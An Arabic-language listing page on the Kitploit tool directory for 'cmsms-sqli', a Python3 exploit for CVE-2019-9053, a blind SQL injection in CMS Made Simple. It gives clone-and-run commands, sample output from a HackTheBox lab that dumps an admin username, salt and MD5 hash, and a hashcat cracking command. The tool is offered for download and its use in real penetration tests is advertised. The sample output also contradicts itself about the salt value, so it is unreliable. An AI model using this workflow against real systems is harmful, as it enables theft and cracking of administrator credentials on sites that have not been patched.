Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cmsms-sqli — استغلال Python3 لثغرة CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). بدون تبعيات، حقن SQL أعمى قائم على الوقت → تفريغ بيانات اعتماد المسؤول. HTB Writeup: تم الاختراق. | Kitploit
أدوات/GitHubGitHub/tim-karov/cmsms-sqli
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراق
GitHubtim-karov/cmsms-sqli

cmsms-sqli

استغلال Python3 لثغرة CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). بدون تبعيات، حقن SQL أعمى قائم على الوقت → تفريغ بيانات اعتماد المسؤول. HTB Writeup: تم الاختراق.

عرض المستودع
5منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حقن SQL في CMS Made Simple <= 2.2.9 (CVE-2019-9053) - استغلال Python3

منفذ Python3 خالص للاستغلال الأصلي في Exploit-DB #46635 بواسطة Daniele Scanu. حقن SQL أعمى قائم على الوقت لتفريغ بيانات اعتماد المدير من تثبيتات CMS Made Simple القابلة للاستغلال.

🎯 الميزات:

✅ لا اعتماديات خارجية (requests فقط)

✅ مكتوب أصلاً لـ Python 3.6+ (f-strings، عامل walrus)

✅ مخرجات ملونة جميلة (ANSI)

✅ مستقر وسريع (تفريغ خلال ~3-5 دقائق على الاتصالات المتوسطة)

✅ معالجة المهلة/الأخطاء للأهداف الإنتاجية

✅ مخرجات جاهزة لـ hashcat (تنسيق salt + MD5)

🚀 الاستخدام:

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 التخصيص:

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 الاعتمادات:

المؤلف الأصلي: Daniele Scanu

Exploit-DB: #46635

منفذ Python3 والتحسينات: Tim Karov

📄 الترخيص:

رخصة MIT - انظر LICENSE


⭐ امنح نجمة إذا كان مفيدًا! يُستخدم في مختبرات HTB/TryHackMe والاختبارات الاختراقية الحقيقية.

تنزيل الأداة